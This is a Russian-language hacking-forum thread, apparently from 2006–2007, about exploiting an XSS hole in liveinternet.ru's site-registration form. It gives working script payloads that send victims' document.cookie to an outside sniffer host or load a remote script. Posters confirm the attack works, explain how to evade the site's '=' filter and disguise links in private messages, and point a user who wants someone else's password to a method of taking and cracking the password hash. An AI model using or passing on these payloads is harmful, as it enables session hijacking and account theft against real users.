liveinternet

liveinternet

11.11.2006, 18:34

LeverOne

Познающий

Регистрация: 22.02.2006

Сообщений: 67

С нами: 10638498

Репутация: 2033

liveinternet

найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось LeverOne; 11.11.2006 в 21:12..

11.11.2006, 18:43

Kalowrat

Новичок

Регистрация: 03.11.2006

Сообщений: 12

С нами: 10273677

Репутация: 0

проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было

ОК

12.11.2006, 23:07

LeverOne

Познающий

Регистрация: 22.02.2006

Сообщений: 67

С нами: 10638498

Репутация: 2033

ОК

Все работает.
Просто пытаются фильтровать "="
Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
Вариант со скриптом на собственном хосте прекрасно прокатывает.
Тема исчерпана.

26.02.2007, 00:35

DeadFire

Новичок

Регистрация: 05.05.2006

Сообщений: 5

С нами: 10535097

Репутация: 0

А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

Очень надо.

Заранее спасибо.

26.02.2007, 10:55

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы)
потом расшифруешь пароль и зайдешь...

Внести депозит

Депозит создан

Вывести депозит